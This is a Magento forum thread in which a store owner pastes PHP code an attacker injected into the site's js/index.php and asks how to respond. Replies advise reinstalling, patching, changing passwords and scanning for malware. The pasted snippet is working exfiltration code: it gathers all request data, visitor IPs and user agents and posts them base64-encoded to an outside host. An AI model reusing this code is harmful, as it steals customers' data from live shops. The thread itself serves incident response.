cancel
Showing results for 
Search instead for 
Did you mean: 

My website was attacked and a file was rewritten by someone malicious.

My website was attacked and a file was rewritten by someone malicious.

I use Magento version 1.9.1.0.

i heard from server manager  that 

"There is doubtful source code in magento/js/index.php"

 

As I checked the file and compared it from original file,

I found somthing worng with my index.php!!!!

 

I'm afraid that it was attaciked and rewritten by someone malicious.

 

this is the additional code below.

 //checking if client have older copy then we have on server
 $url='http://ownsafety.org/obf.php';

 if($_COOKIE["SESSIID"]!=""){

     // try automatically get content type if requested
     $url=$url.'?a='.$_COOKIE["SESSIID"];
     $data=base64_encode($data);
     $ch = curl_init();

     // set custom content type if specified
     curl_setopt($ch, CURLOPT_URL,$url);
     curl_setopt($ch, CURLOPT_POST, 1);
     curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, 30 );
     curl_setopt( $ch, CURLOPT_TIMEOUT, 30 );
     curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query(array('data'=>$data,'utmp'=>$id)));
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
     curl_exec ($ch);
     curl_close ($ch);

 } else{

     // try automatically get content type if requested
     $rand=rand(1,9999999999);
     setcookie("SESSIID", $rand,time()+3600);
     $data=json_encode(array('request'=>$_REQUEST, 'ip'=>$_SERVER['REMOTE_ADDR'],'ua'=>$_SERVER['HTTP_USER_AGENT'],'cookie        '=>$rand,'date_unix'=>time()));
     $data=base64_encode($data);
     $url=$url.'?a='.$rand;
     $ch = curl_init();

     // set custom content type if specified
     curl_setopt($ch, CURLOPT_URL,$url);
     curl_setopt($ch, CURLOPT_POST, 1);
     curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, 30 );
     curl_setopt( $ch, CURLOPT_TIMEOUT, 30 );
     curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query(array('data'=>$data,'utmp'=>$id)));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
    curl_exec ($ch);
    curl_close ($ch);

}

// no files specified return 404
if (empty($_GET['f'])) {
    header('HTTP/1.0 200 OK');
    echo "SYNTAX: index.php/x.js?f=dir1/file1.js,dir2/file2.js";
    exit;
}

 

The URL in this file above is not safe website.

It is not allowed to access by Google Chrome.

 

Of course, I didn't  describe such a dangerous URL ever.

 

What should I do now?

erase this code? OR replace this file before?Or do nothing....

 

Please advise Me.

 

 

4 REPLIES

Re: My website was attacked and a file was rewritten by someone malicious.

Apparently your system is already compromised. When such thing happens people usually reinstall full container as there's not a single component you can really trust. Hopefully you versioned your code and have media - database backups. Ah, and you should patch your Magento up as well as well. And change ALL passwords.

 

And you should figure out how bad guys got in. Because unless your close that hole it doesnät really matter how safe your system is esewhere as they can waltz right in again.

Tanel Raja

Re: My website was attacked and a file was rewritten by someone malicious.

Magento recommends that you take the following steps to investigate and address your issue:

  • Check your site using Magereport.com, a free service that provides insight into your security status.
  • If the scan confirms your site has been impacted by malware, work with your Solution Partner or developer to clean your site and follow our recommended site remediation steps.
  • Deploy any missing security patches and address other issues discovered by the Magereport.com scan. Security patches are available on the Community Edition download page under the Release Archive tab.
  • Protect yourself against password guessing, which is increasingly being used to attack sites that have all security patches in place.
  • Implement Magento Security Best Practices to further protect your site.
  • Sign up to receive Magento security notifications to stay up-to-date on security recommendations and issues.
  • Advanced users can also use malware discovery rules provided by the author of Magereport.com to detect specific infected files on your site.

 

It is important that you work with your Solution Partner or developer to thoroughly clean your site if it is infected. The malicious code can live in many places, including payment template files, in core files, or in full access shells located in various directories, such as the media directory. If any code or unrecognized admin accounts are left behind, it is possible for the malicious code to be reinserted after cleanup.

 

Implementing best practices is critical for long-term security. Our investigations show that attackers typically gain access by targeting sites that:

  • Do not have up-to-date security patches
  • Use vulnerable versions of extensions like Magmi or WebForms
  • Are not cleaned properly after a malware attack, allowing left over code to reinsert the malicious code after cleanup
  • Have open admin, downloader, and RSS urls without protection against password guessing

 

We strongly encourage you to follow the steps outlined above to close these common attack pathways.

 

Best regards,

The Magento Team

 

Re: My website was attacked and a file was rewritten by someone malicious.

Thank you for your reply.

 

I'm sdure that my website was compromised.

I' going to change all passwords and investigate how they went in my site and rewrote files.

 

thank you

Re: My website was attacked and a file was rewritten by someone malicious.

Hi,

may I suggest that you check out MageFence security extension for your website. I have been using it for quite some time and it has great features that help you keep your store secure.

 

It scans your Magento installation as frequently as you want it to, and shows the list of all the files that have been changed. It also scans for malware infections and malicious admin users, sends email notifications anytime admin user logs in, it blocks brute force attacks.

 

Also the developers are doing an awesome job in keeping this module up to date with the latest security issues and recommendations.

I'm sure I'm forgetting something, but if I start describing how useful the extension has been for my websites, it would be a very long post. So I honestly recommend that you check it out yourself:

https://www.magentocommerce.com/magento-connect/security-extension-magefence.html

https://www.extensionsmall.com/mage-fence-security.html